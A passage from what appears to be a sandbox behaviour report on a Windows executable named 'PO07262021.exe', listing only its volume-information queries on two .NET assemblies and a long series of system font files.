          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
